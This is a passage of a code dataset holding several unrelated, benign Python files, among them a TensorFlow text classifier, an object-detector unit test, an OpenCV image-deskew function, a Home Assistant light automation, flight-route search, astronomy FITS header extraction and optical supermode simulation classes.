states, _= rnn.static_bidirectional_rnn(fw_lstm_cell, bw_lstm_cell, x, dtype=tf.float32)\n\n with tf.variable_scope(\"letter\"):\n u = tf.reshape(u, shape=[-1, n_sent_letters, n_letter_embedding, 1])\n\n conv1 = tf.layers.conv2d(u, n_letter_hidden, (4, n_letter_embedding), activation=tf.nn.relu)\n conv2 = tf.layers.conv2d(u, n_letter_hidden, (3, n_letter_embedding), activation=tf.nn.relu)\n conv3 = tf.layers.conv2d(u, n_letter_hidden, (2, n_letter_embedding), activation=tf.nn.relu)\n conv4 = tf.layers.conv2d(u, n_letter_hidden, (5, n_letter_embedding), activation=tf.nn.relu)\n\n conv1 = tf.layers.max_pooling2d(conv1, strides=1, pool_size=(597, 1))\n conv2 = tf.layers.max_pooling2d(conv2, strides=1, pool_size=(598, 1))\n conv3 = tf.layers.max_pooling2d(conv3, strides=1, pool_size=(599, 1))\n conv4 = tf.layers.max_pooling2d(conv4, strides=1, pool_size=(596, 1))\n \n conv_final = tf.layers.max_pooling2d(tf.concat([conv1, conv2, conv3, conv4], 1), strides=1, pool_size = (4, 1))\n \n output_letter = tf.contrib.layers.flatten(conv_final)\n output_letter = tf.layers.dropout(output_letter, rate=dropout, training=is_training)\n \n max_output = outputs[0]\n\n for i in range(1, len(outputs)):\n max_output = tf.maximum(max_output, outputs[i])\n \n final_output = tf.concat((max_output, output_letter), 1)\n\n final_output2 = tf.nn.relu(tf.matmul(final_output, weights['inner']) + biases['inner'])\n\n \n # Linear activation, using rnn inner loop last output\n return tf.matmul(final_output2, weights['out']) + biases['out']\n\n\nwith tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\"embedding\", [dp.vocab_size, n_word_embedding], dtype=tf.float32)\n inputs = tf.nn.embedding_lookup(embedding, x)\n\n letter_embedding = tf.get_variable(\"letter_embedding\", [dp.vocab_char_size, n_letter_embedding], dtype=tf.float32)\n inputs_letter = tf.nn.embedding_lookup(letter_embedding, u)\n\n\npred = RNN(inputs, inputs_letter, weights, biases, word_dropout, is_training)\n\nsoftmax_pred = tf.nn.softmax(pred)\n# Define loss and optimizer\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\n\n# Evaluate model\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initializing the variables\ninit = tf.global_variables_initializer()\n\nlst_train_cost = []\nlst_valid_cost = []\n\nlst_train_accr = []\nlst_valid_accr = []\n# Launch the graph\nwith tf.Session() as sess:\n sess.run(init)\n \n # Keep training until reach max iterations\n for i in range(train_iteration):\n train_accr = 0.0\n valid_accr = 0.0\n train_cost = 0.0\n valid_cost = 0.0\n\n step = 0\n epoch_size = max(dp.train_size // batch_size, 1)\n while step < epoch_size:\n batch_x, batch_y, batch_char_u= dp.get_next_train_batch(batch_size)\n acc, loss, _ = sess.run([accuracy, cost, optimizer], feed_dict={x: batch_x, y: batch_y, u: batch_char_u, word_dropout: my_droup_out, is_training: True})\n train_accr += acc \n train_cost += loss\n \n step += 1\n \n lst_train_cost.append(train_cost/epoch_size)\n lst_train_accr.append(train_accr/epoch_size)\n \n \n valid_data, valid_label, valid_char_data = dp.get_next_valid_batch(dp.valid_size)\n\n acc , loss= sess.run([accuracy, cost], feed_dict={x: valid_data, y: valid_label, u:valid_char_data, word_dropout: 1.0, is_training:False})\n \n lst_valid_cost.append(loss)\n lst_valid_accr.append(acc)\n\n print(str(i) + \"-TrainLoss = {:.3f}\".format(train_cost/epoch_size) + \", TrainAccr= {:.3f}\".format(train_accr/epoch_size) + \", ValidLoss = {:.3f}\".format(loss) + \", ValidAccr= {:.3f}\".format(acc))\n \n \n accr = 0\n accr_per_post = 0\n\n number_of_post = 0\n for i in range(n_classes):\n test_data, test_label, test_char_data= dp.get_next_test_batch(i)\n loss, acc, prediction = sess.run([cost, accuracy, softmax_pred], feed_dict={x: test_data, y: test_label, u:test_char_data, word_dropout: 1.0, is_training:False})\n\n for predict in prediction:\n number_of_post += 1\n if predict.argmax(axis=0) == i:\n accr_per_post += 1\n\n result = np.sum(np.log10(prediction), axis=0)\n max_idx = result.argmax(axis=0)\n if max_idx == i :\n accr += 1\n \n\n #result = (np.sum(prediction, axis=0)/np.sum(np.sum(prediction, axis=0))).tolist()\n #temp = result[i]\n #result.sort(reverse=True)\n #max_index = result.index(temp)\n #print(' '.join([str(k) for k in result[:(max_index+1)]]))\n #print(\"Test Loss = {:.3f}\".format(loss) + \", Test Accuracy= {:.3f}\".format(acc))\n \n print('accr is {0:.3f} accr per post is {1:.3f}'.format(accr / n_classes, accr_per_post/number_of_post))\n\n #plt.plot(range(len(lst_train_cost)), lst_train_cost, 'g--', range(len(lst_valid_cost)), lst_valid_cost, 'b--')\n #plt.figure()\n\n #plt.plot(range(len(lst_train_accr)), lst_train_accr, 'g--', range(len(lst_valid_accr)), lst_valid_accr, 'b--')\n #plt.show()\n","sub_path":"future/rnncnn.py","file_name":"rnncnn.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"93812176","text":"import torch\nfrom mmdet.models.builder import build_detector\n\nfrom otx.mpa.modules.models.detectors.custom_atss_detector import CustomATSS\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\n\n\nclass TestCustomATSS:\n @e2e_pytest_unit\n def test_custom_atss_build(self):\n model_cfg = dict(\n type=\"CustomATSS\",\n backbone=dict(\n avg_down=False,\n base_channels=64,\n conv_cfg=None,\n dcn=None,\n deep_stem=False,\n depth=18,\n dilations=(1, 1, 1, 1),\n frozen_stages=-1,\n in_channels=3,\n init_cfg=None,\n norm_cfg=dict(requires_grad=True, type=\"BN\"),\n norm_eval=True,\n num_stages=4,\n out_indices=(0, 1, 2, 3),\n plugins=None,\n pretrained=None,\n stage_with_dcn=(False, False, False, False),\n stem_channels=None,\n strides=(1, 2, 2, 2),\n style=\"pytorch\",\n type=\"mmdet.ResNet\",\n with_cp=False,\n zero_init_residual=True,\n ),\n neck=dict(\n type=\"FPN\",\n in_channels=[64, 128, 256, 512],\n out_channels=64,\n start_level=1,\n add_extra_convs=\"on_output\",\n num_outs=5,\n relu_before_extra_convs=True,\n ),\n bbox_head=dict(\n type=\"CustomATSSHead\",\n num_classes=2,\n in_channels=64,\n stacked_convs=4,\n feat_channels=64,\n anchor_generator=dict(\n type=\"AnchorGenerator\",\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n strides=[8, 16, 32, 64, 128],\n ),\n bbox_coder=dict(\n type=\"DeltaXYWHBBoxCoder\", target_means=[0.0, 0.0, 0.0, 0.0], target_stds=[0.1, 0.1, 0.2, 0.2]\n ),\n loss_cls=dict(type=\"FocalLoss\", use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=1.0),\n loss_bbox=dict(type=\"GIoULoss\", loss_weight=2.0),\n loss_centerness=dict(type=\"CrossEntropyLoss\", use_sigmoid=True, loss_weight=1.0),\n use_qfl=False,\n qfl_cfg=dict(type=\"QualityFocalLoss\", use_sigmoid=True, beta=2.0, loss_weight=1.0),\n ),\n )\n\n model = build_detector(model_cfg)\n assert isinstance(model, CustomATSS)\n\n @e2e_pytest_unit\n def test_custom_atss_load_state_dict_pre_hook(self):\n chkpt_classes = [\"person\", \"car\"]\n model_classes = [\"tree\", \"car\", \"person\"]\n chkpt_dict = {\n \"bbox_head.atss_cls.weight\": torch.tensor(\n [\n [1, 1, 1, 1],\n [2, 2, 2, 2],\n ]\n ),\n \"bbox_head.atss_cls.bias\": torch.tensor(\n [\n [1],\n [2],\n ]\n ),\n }\n model_dict = {\n \"bbox_head.atss_cls.weight\": torch.tensor(\n [\n [3, 3, 3, 3],\n [4, 4, 4, 4],\n [5, 5, 5, 5],\n ]\n ),\n \"bbox_head.atss_cls.bias\": torch.tensor(\n [\n [3],\n [4],\n [5],\n ]\n ),\n }\n gt_dict = {\n \"bbox_head.atss_cls.weight\": torch.tensor(\n [\n [3, 3, 3, 3],\n [2, 2, 2, 2],\n [1, 1, 1, 1],\n ]\n ),\n \"bbox_head.atss_cls.bias\": torch.tensor(\n [\n [3],\n [2],\n [1],\n ]\n ),\n }\n\n class Model:\n def state_dict(self):\n return model_dict\n\n CustomATSS.load_state_dict_pre_hook(Model(), model_classes, chkpt_classes, chkpt_dict, \"\")\n for k, gt in gt_dict.items():\n assert (chkpt_dict[k] != gt).sum() == 0\n","sub_path":"tests/unit/mpa/modules/models/detectors/test_custom_atss_detector.py","file_name":"test_custom_atss_detector.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223058796","text":"import cv2\nimport numpy as np\n\ndef skew(coords, image, w, h):\n noise_image = image\n rows, cols, ch = noise_image.shape\n # w,h = image.shape[:2] #görüntünün yüksekliği ve genişliğini alır\n # print(w,h)\n sol_ust = coords[0] # gelen koordinatların değerleri sırasıyla referanslara atanıyor\n sag_ust = coords[1]\n sol_alt = coords[2]\n sag_alt = coords[3]\n\n pts1 = np.float32([[sol_ust[0], sol_ust[1]], [sol_alt[0], sol_alt[1] + h], [sag_ust[0] + w, sag_ust[1]], [sag_alt[0] + w, sag_alt[1] + h]]) # belirlenen koordinatların değerleri float32 olarak pts1 referansına atanıyor\n pts2 = np.float32([[0, 0], [0, 3308], [2280, 0], [2280, 3308]]) # kırpma işlemi yapıldıktan sonra 2280-3308 boyutlarında bir çerçevenin boyutları pts2 ye atanıyor\n M = cv2.getPerspectiveTransform(pts1, pts2)\n width, hight = noise_image.shape[:2]\n dst = cv2.warpPerspective(noise_image, M, (2280, 3308)) # kırpma işlemi gerçekleştirilden sonra hedef görüntü dst değişkenine atanıyor\n\n # plt.subplot(121),plt.imshow(noise_image),plt.title('Input')\n # plt.subplot(122),plt.imshow(dst),plt.title('Output')\n # plt.show()\n #cv2.imwrite('C:\\\\Users\\\\NovaPM\\\\Desktop\\\\test_image\\\\orj_sskew.jpg',dst)\n return dst","sub_path":"skew_image.py","file_name":"skew_image.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"605979940","text":"import hassapi as hass\n\n#\n# Carport light controller\n#\n# App to turn lights on when motion detected then off again after a delay\n#\n# Use with constraints to activate only for the hours of darkness\n#\n# Args:\n#\n# delay: amount of time after turning on to turn off again. If not specified defaults \n# to 60 seconds.\n#\n# Release Notes\n#\n# Version 1.0:\n# Initial Version adapted from: \n# https://github.com/AppDaemon/appdaemon/blob/dev/conf/example_apps/motion_lights.py\n\n\nclass CarportLight(hass.Hass):\n\n def initialize(self):\n self.handle = None\n # Subscribe to sensors\n if \"sensor\" in self.args:\n for sensor in self.args['sensor']:\n self.listen_state(self.motion, sensor)\n else:\n self.log(\"No sensor specified, doing nothing\")\n\n def motion(self, entity, attribute, old, new, kwargs):\n if self.sun_down(): # check that it is still dark \n if new == \"on\":\n if \"entity_ctrl\" in self.args:\n for entity in self.args['entity_ctrl']:\n self.log(\"Motion detected: turning {} on\".format(entity))\n self.turn_on(entity)\n if \"delay\" in self.args:\n delay = self.args[\"delay\"]\n else:\n delay = 60\n self.cancel_timer(self.handle)\n self.handle = self.run_in(self.light_off, delay)\n\n def light_off(self, kwargs):\n if \"entity_ctrl\" in self.args:\n for entity in self.args['entity_ctrl']:\n self.log(\"Turning {} off\".format(entity))\n self.turn_off(entity)","sub_path":"src/appdaemon/apps/carport_light.py","file_name":"carport_light.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"125652604","text":"import difflib\nimport math\nfrom fuzzywuzzy import fuzz\n\ndiff = difflib.Differ()\n\n\ndef similarity_word(dst_str, src_str):\n ratio = float(fuzz.token_set_ratio(dst_str, src_str)) / 100.0\n avg_len = (len(dst_str) + len(src_str)) / 2\n sub_len = math.fabs(len(dst_str) - len(src_str)) / 2\n return ratio * (avg_len - sub_len) / avg_len\n\n\ndef equal(str1, str2):\n str1 = str1.upper().replace(\" \", \"\")\n str2 = str2.upper().replace(\" \", \"\")\n return similarity_word(str1, str2) > 0.9\n\n\ndef find_keyword(line_text, keyword):\n if len(line_text) <= len(keyword):\n ratio = float(fuzz.token_set_ratio(line_text, keyword)) / 100.0\n max_ratio = ratio * len(line_text) / len(keyword)\n last_same_pos = 0\n else:\n max_ratio = 0\n last_same_pos = 0\n for pos in range(len(line_text) - len(keyword)):\n sub_text = line_text[pos: pos + len(keyword)]\n ratio = float(fuzz.token_set_ratio(sub_text, keyword)) / 100.0\n if max_ratio < ratio:\n max_ratio = ratio\n last_same_pos = pos\n\n if max_ratio > 0.9:\n return last_same_pos\n else:\n return -1\n","sub_path":"utils/string_manage.py","file_name":"string_manage.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313040082","text":"from __future__ import division, print_function\nimport sys, os, glob, time, warnings, gc\n# import matplotlib\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.table import Table, vstack, hstack\nimport fitsio\nfrom astropy.io import fits\n\nfrom multiprocessing import Pool\n\nn_processes = 32\n\nimage_dir = '/global/cfs/cdirs/cosmo/staging/'\n\nsurveyccd_path = '/global/project/projectdirs/cosmo/work/legacysurvey/dr9/survey-ccds-decam-dr9.fits.gz'\n# surveyccd_path = '/global/cfs/cdirs/cosmo/work/legacysurvey/dr9-garage/reorg/decam/survey-ccds-decam-dr8-newlocs2.fits.gz'\n\nccd = Table(fitsio.read(surveyccd_path, columns=['expnum', 'image_filename', 'filter']))\nprint(len(ccd))\n\n# Only keep unique exposures\n_, idx = np.unique(ccd['expnum'], return_index=True)\nccd = ccd[idx]\nprint(len(ccd))\n\ndef get_pupil_params(index):\n\n image_path = os.path.join(image_dir, ccd['image_filename'][index].strip())\n with fitsio.FITS(image_path) as f:\n try:\n header = f[0].read_header()\n if 'PUPILSKY' in header:\n pupilsky = header['PUPILSKY']\n else:\n pupilsky = np.nan\n if 'PUPILMAX' in header:\n pupilmax = header['PUPILMAX']\n else:\n pupilmax = np.nan\n if 'PUPILAMP' in header:\n pupilamp = header['PUPILAMP']\n else:\n pupilamp = np.nan\n except:\n pupilsky = np.nan\n pupilmax = np.nan\n pupilamp = np.nan\n\n return pupilsky, pupilmax, pupilamp\n\ndef main():\n\n # ccd['PUPILSKY'] = 0.\n # ccd['PUPILMAX'] = 0.\n # ccd['PUPILAMP'] = 0.\n\n # for index in np.arange(len(ccd)):\n\n # if index%100==0:\n # print(index, '/', len(ccd))\n\n # res = get_pupil_params(index)\n # ccd['PUPILSKY'][index] = res[0]\n # ccd['PUPILMAX'][index] = res[1]\n # ccd['PUPILAMP'][index] = res[2]\n\n # ccd.write('/global/cscratch1/sd/rongpu/dr9dev/pupil_pattern/survey-ccds-decam-dr8-pupil-params.fits')\n\n # print('Done!!!!!!!!!!!!!!!!!!!!!')\n\n with Pool(processes=n_processes) as pool:\n res = pool.map(get_pupil_params, np.arange(len(ccd)))\n\n res = np.array(res)\n ccd['PUPILSKY'] = res[:, 0]\n ccd['PUPILMAX'] = res[:, 1]\n ccd['PUPILAMP'] = res[:, 2]\n\n ccd.write('/global/cscratch1/sd/rongpu/dr9dev/pupil_pattern/survey-ccds-decam-dr9-pupil-params.fits')\n\n print('Done!!!!!!!!!!!!!!!!!!!!!')\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"pupil_pattern/assemble_pupil_parameters.py","file_name":"assemble_pupil_parameters.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"316756303","text":"import pandas as pd\n\n# Read in the airports data.\nairports = pd.read_csv(\"data/airports.dat\", header=None, na_values='\\\\N')\nairports.columns = [\"ID\", \"NAME\", \"CITY\", \"COUNTRY\", \"IATA\", \"ICAO\", \"LATITUDE\", \"LONGITUDE\", \"ALTITUDE\", \"TIMEZONE\",\n \"DST\", \"TZ\", \"TYPE\", \"SOURCE\"]\n\n# Read in the airlines data.\nairlines = pd.read_csv(\"data/airlines.dat\", header=None, na_values='\\\\N')\nairlines.columns = [\"ID\", \"NAME\", \"ALIAS\", \"IATA\", \"ICAO\", \"CALLSIGN\", \"COUNTRY\", \"ACTIVE\"]\n\n# Read in the routes data.\nroutes = pd.read_csv(\"data/routes.dat\", header=None, na_values='\\\\N')\nroutes.columns = [\"AIRLINE\", \"AIRLINE_ID\", \"SOURCE\", \"SOURCE_ID\", \"DEST\", \"DEST_ID\", \"CODESHARE\", \"STOPS\", \"EQUIPMENT\"]\n# routes = routes[(routes['SOURCE'] == \"LEX\")|(routes['SOURCE'] == \"ORD\")]\n\n# Read in the planes data.\nplanes = pd.read_csv(\"data/planes.dat\", header=None, na_values='\\\\N')\nplanes.columns = [\"NAME\", \"IATA\", \"ICAO\"]\n\n# Read in the countries data.\ncountries = pd.read_csv(\"data/countries.dat\", header=None, na_values='\\\\N')\ncountries.columns = [\"NAME\", \"ISO\", \"DAFIF\"]\n\nsetConnections = set()\ndNodes = []\n\n\ndef get_cityIATAname(city_name):\n df = airports[airports[\"CITY\"].str.casefold() == str(city_name).casefold()]\n if len(df) > 0:\n nameIATA = airports[airports[\"CITY\"].str.casefold() == str(city_name).casefold()][\"IATA\"]\n return nameIATA.item()\n\n\ndef get_direct_connection(flyFromCity_IATA, flyToCity_IATA):\n df = routes[(routes['SOURCE'] == flyFromCity_IATA) & (routes['DEST'] == flyToCity_IATA)]\n transfer = 0\n bTransfer = False\n if df.empty:\n bTransfer = False\n else:\n bTransfer = True\n return bTransfer\n\n\ndef get_connection(start, goal):\n global dNodes, setConnections\n setConnections.add(str(start))\n strConnection = \"\"\n df = routes[(routes['SOURCE'] == start)]\n connections = df[\"DEST\"].unique()\n connections.sort()\n output = 0\n for connection in connections:\n if connection is not None:\n if not connection in setConnections:\n setConnections.add(connection)\n bTransfer = get_direct_connection(connection, goal)\n if not bTransfer:\n dNodes.append(connection)\n get_connection(connection, goal)\n else:\n dNodes.append(connection)\n dNodes.append(goal)\n break\n\n\ndef main():\n flyFromCity = \"Lexington KY\"\n flyToCity = \"Mumbai\"\n noTransfers = 2\n\n\n # # Describe the situation: from --> to city, number of transfers acceptable\n # global dNodes, setConnections\n # flyFromCity = \"Lexington KY\"\n # flyToCity = \"Mumbai\"\n # noTransfers = 2\n # strConnection = \"\"\n # # get IATA code for the respective cities\n # flyFromCity_IATA = get_cityIATAname(flyFromCity)\n # flyToCity_IATA = get_cityIATAname(flyToCity)\n # # transfers = get_direct_connection(flyFromCity_IATA, flyToCity_IATA,noTransfers)\n # bTransfer = get_direct_connection(flyFromCity_IATA, flyToCity_IATA)\n # if not bTransfer:\n # if not str(flyFromCity_IATA) in setConnections:\n # setConnections.add(flyFromCity_IATA)\n # dNodes.append(flyFromCity_IATA)\n # get_connection(flyFromCity_IATA, flyToCity_IATA)\n # else:\n # if not str(flyFromCity_IATA) in setConnections:\n # dNodes.append(flyFromCity_IATA)\n # dNodes.append(flyToCity_IATA)\n #\n # # map out possibility of reaching destination from the source\n # if len(dNodes) <= (noTransfers + 2):\n # for item in dNodes:\n # strConnection = str(item) + \"--> \"\n # print(\"You can fly via \" + strConnection)\n # else:\n # print(\"Connections could not be established with \" + str(noTransfers) + \" of transfers\")\n #\n # # i = 0\n # # # if dfDirect.empty:\n # # if transfers < 0:\n # # transfers=1\n # # dNodes.add(flyFromCity)\n # # i = get_connection(flyFromCity_IATA, flyToCity_IATA,transfers,noTransfers)\n # # if i <= noTransfers:\n # # print(flyFromCity + \"-->\")\n # # else:\n # # dNodes.add(str(flyFromCity_IATA), str(flyToCity_IATA))\n # # print(str(flyFromCity_IATA) + \"-->\" + str(flyToCity_IATA))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"07-Data Wrangling/Kevin.Bacon.py","file_name":"Kevin.Bacon.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"572123845","text":"\"\"\"\n给你无向 连通 图中一个节点的引用,请你返回该图的 深拷贝(克隆)。\n图中的每个节点都包含它的值 val(int) 和其邻居的列表(list[Node])。\nclass Node {\n public int val;\n public List neighbors;\n}\n测试用例格式:\n简单起见,每个节点的值都和它的索引相同。例如,第一个节点值为 1(val = 1),第二个节点值为 2(val = 2),以此类推。该图在测试用例中使用邻接列表表示。\n邻接列表 是用于表示有限图的无序列表的集合。每个列表都描述了图中节点的邻居集。\n给定节点将始终是图中的第一个节点(值为 1)。你必须将 给定节点的拷贝 作为对克隆图的引用返回。\n示例 1:\n输入:adjList = [[2,4],[1,3],[2,4],[1,3]]\n输出:[[2,4],[1,3],[2,4],[1,3]]\n解释:\n图中有 4 个节点。\n节点 1 的值是 1,它有两个邻居:节点 2 和 4 。\n节点 2 的值是 2,它有两个邻居:节点 1 和 3 。\n节点 3 的值是 3,它有两个邻居:节点 2 和 4 。\n节点 4 的值是 4,它有两个邻居:节点 1 和 3 。\n示例 2:\n输入:adjList = [[]]\n输出:[[]]\n解释:输入包含一个空列表。该图仅仅只有一个值为 1 的节点,它没有任何邻居。\n示例 3:\n输入:adjList = []\n输出:[]\n解释:这个图是空的,它不含任何节点。\n示例 4:\n输入:adjList = [[2],[1]]\n输出:[[2],[1]]\n提示:\n节点数不超过 100 。\n每个节点值 Node.val 都是唯一的,1 <= Node.val <= 100。\n无向图是一个简单图,这意味着图中没有重复的边,也没有自环。\n由于图是无向的,如果节点 p 是节点 q 的邻居,那么节点 q 也必须是节点 p 的邻居。\n图是连通图,你可以从给定节点访问到所有节点。\n\"\"\"\n\n\nclass Node:\n def __init__(self, val=0, neighbors=[]):\n self.val = val\n self.neighbors = neighbors\n\n\nclass Solution:\n def cloneGraph(self, node: 'Node') -> 'Node':\n # 使用广度遍历\n if not node:\n return node\n visted = {}\n statck = [node]\n visted[node] = Node(node.val, [])\n while len(statck) > 0:\n tree = statck.pop(0)\n for neighbor in tree.neighbors:\n if neighbor not in visted:\n visted[neighbor] = Node(neighbor.val, [])\n statck.append(neighbor)\n visted[tree].neighbors.append(visted[neighbor])\n return visted[node]\n","sub_path":"medium/leetcode133.py","file_name":"leetcode133.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"456867564","text":"import math\r\n\r\ntolerance = 0.000001\r\nestimate = 1.0\r\nx = float(input(\"Enter a number: \"))\r\n\r\ndef newton(num, estimate):\r\n estimate = (estimate + num / estimate) / 2\r\n difference = abs(num - estimate ** 2)\r\n\r\n if difference <= tolerance:\r\n return estimate\r\n else:\r\n return newton(num, estimate)\r\n\r\nprint(\"The program's estimate: \", newton(x, estimate))\r\nprint(\"Python's estimate: \", math.sqrt(x))\r\n\r\n\r\n","sub_path":"Week 8 Projects/Project #2.py","file_name":"Project #2.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593657342","text":"\"\"\"\nPrint MuSE graph (formatted to be input for DCEP-Ambrosia), transmission ratio and computation time.\nWrite result to musecosts_*.csv\n\"\"\"\nimport pickle\nimport csv\nimport sys\nfrom multi_muse import *\n\n\n\ndef format_output(res, placementnode):\n\n string = \"SELECT \" + str(res) + \" FROM \" + format_input_combi(finalcombi[res][placementnode]) + \" ON \" + format_input_nodes(finalplacement_dict[res][placementnode]) + \"/n(\" + get_source(res, placementnode) +\")\"\n if not res in wl:\n string += \" WITH selectionRate = \" + str(projrates[res][0])\n print(string)\n for element in finalcombi[res][placementnode]: \n if len(element) > 1 and not len(finalcombi[res][placementnode]) == 1: \n format_output(element, combis2[res][placementnode][finalcombi[res][placementnode]][element])\n \n \ndef format_input_combi(combi):\n mystring = \" \"\n for i in combi:\n mystring += str(i) + \", \"\n mystring = mystring[:-2]\n return mystring\n\ndef format_input_nodes(nodes):\n mystring = \"{\"\n for i in nodes:\n mystring += str(i) + \", \"\n mystring = mystring[:-2]\n mystring += \"}\"\n return mystring\n\n\n\ndef main():\n \n print(\"MuSE Graph\")\n print(\"-----------\") \n for i in bestplacements.keys():\n format_output(i, bestplacements[i])\n print(\"\\n\") \n \n print(\"central costs \" + str(centralcosts()))\n print(\"final costs muse: \" + str(musecosts)) \n print(\"transmission ratio \" + str(transmissionratio))\n print(\"total computation time: \" + totaltime ) \n \n if len(sys.argv)>1:\n experiment_id = sys.argv[1]\n else:\n experiment_id = 1\n if len(sys.argv)>2:\n filename = sys.argv[2]\n else:\n filename = \"none\"\n \n \n with open(\"aMuSE_\"+str(filename)+\".csv\", \"a\") as result:\n writer = csv.writer(result)\n writer.writerow([experiment_id, transmissionratio, len(list(combinationcosts.keys()))-len(wl), round(time.time() - start_time,2) + combigen_time])\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"aMuSE/code/aMuse.py","file_name":"aMuse.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"28335431","text":"import logging\nimport numpy as np\nimport copy as cp\nimport matplotlib.pyplot as plt\nfrom progressbar import ProgressBar\nfrom itertools import combinations, combinations_with_replacement as Combinations\nfrom mayavi import mlab\n\nfrom SuPyModes.Config import *\nfrom SuPyModes.utils import RecomposeSymmetries, GetWidgetBar, SortSuperSet, Enumerate\nfrom SuPyModes.BaseClass import SetPlots, SetProperties\nfrom SuPyModes.Special import ModeCoupling, ModeAdiabatic\n\n\n\nMlogger = logging.getLogger(__name__)\n\nclass SuperMode(object):\n\n def __init__(self, Name, Geometry):\n self.Name = Name\n self.Slice = []\n self._Adiabatic = None\n self._Coupling = None\n self.Geometry = Geometry\n\n\n\n def Append(self, **kwargs):\n self.Slice.append(kwargs['Field'])\n\n\n def __getitem__(self, N):\n return self.Slice[N]\n\n\n def __setitem__(self, N, val):\n self.Slice[N] = val\n\n\n @property\n def DegenerateFactor(self):\n Factor = 1\n\n if self.Geometry.Axes.Symmetries[0] in [1,-1]: Factor *= 2\n\n if self.Geometry.Axes.Symmetries[1] in [1,-1]: Factor *= 2\n\n return Factor\n\n\n def GetCoupling(self, SuperMode):\n C = []\n for n, itr in enumerate(self.Geometry.ITRList[:-1]):\n C.append( ModeCoupling(SuperMode0 = self,\n SuperMode1 = SuperMode,\n k = self.Geometry.Axes.Direct.k,\n Profile = self.Geometry.mesh,\n Gradient = self.Geometry.Gradient(),\n iter = n) )\n\n return C\n\n\n def GetAdiabatic(self, SuperMode):\n A = []\n for n, itr in enumerate(self.Geometry.ITRList[:-1]):\n A.append( ModeAdiabatic(SuperMode0 = self,\n SuperMode1 = SuperMode,\n k = self.Geometry.Axes.Direct.k,\n Profile = self.Geometry.mesh,\n Gradient = self.Geometry.Gradient(),\n iter = n) )\n\n return A\n\n\n def PlotPropagation(self):\n image, _, _ = self.FullField(0)\n\n image = np.abs(image)\n\n mlab.surf(image, warp_scale=\"auto\")\n\n @mlab.animate(delay=100)\n def anim_loc():\n for i in range(len(self.Field)):\n image, _, _ = self.FullField(i)\n mlab.surf( np.abs(image), warp_scale=\"auto\")\n yield\n\n anim_loc()\n mlab.show()\n \"\"\"\n import os\n fps = 20\n prefix = 'ani'\n ext = '.png'\n\n import subprocess\n animate_plots(base_directory='yolo', fname_prefix='dasda')\"\"\"\n\n\n def FullField(self, iter):\n Field = self.Slice[iter]\n\n Field, xAxes, yAxes = RecomposeSymmetries(Input = Field, Axes = self.Geometry.Axes)\n\n return Field, xAxes, yAxes\n\n\n def __copy__(self):\n to_be_copied = ['Slice']\n\n copy_ = SuperSet( self.Name, self.Geometry)\n\n for attr in self.__dict__:\n if attr in to_be_copied:\n\n copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n else:\n\n copy_.__dict__[attr] = self.__dict__[attr]\n\n return copy_\n\n\n def __deepcopy__(self, memo):\n to_be_copied = ['Slice']\n\n copy_ = SuperMode( self.Name, self.Geometry)\n\n for attr in self.__dict__:\n\n if attr in to_be_copied:\n\n copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n else:\n\n copy_.__dict__[attr] = self.__dict__[attr]\n\n return copy_\n\n\n\nclass SuperSet(SetProperties, SetPlots):\n def __init__(self, NSolutions, Geometry, debug='INFO'):\n Mlogger.setLevel(getattr(logging, debug))\n\n self.NSolutions = NSolutions\n self.SuperModes = []\n self._Coupling = None\n self._Adiabatic = None\n self._Index = None\n self._Beta = None\n self.Geometry = Geometry\n self._M = None\n self.Init()\n\n self.combinations = tuple(combinations( np.arange(NSolutions), 2 ) )\n self.Combinations = tuple(Combinations( np.arange(NSolutions), 2 ) )\n\n\n def Init(self):\n for solution in range(self.NSolutions):\n supermode = SuperMode(Name = f\"Mode {solution}\",\n Geometry = self.Geometry)\n\n self.SuperModes.append(supermode)\n\n\n def __getitem__(self, N):\n return self.SuperModes[N]\n\n\n def __setitem__(self, N, val):\n self.SuperModes[N] = val\n\n\n def SwapProperties(self, SuperMode0, SuperMode1, N):\n S0, S1 = SuperMode0, SuperMode1\n\n for p in PROPERTIES:\n getattr(S0, p)[N] = getattr(S1, p)[N]\n\n\n def Ordering(self):\n for iter, _ in Enumerate( self.Geometry.ITRList, msg='Sorting super modes... '):\n self.OrderingModes(iter)\n\n\n def Debug(self):\n for n, itr in enumerate( self.Geometry.ITR ):\n 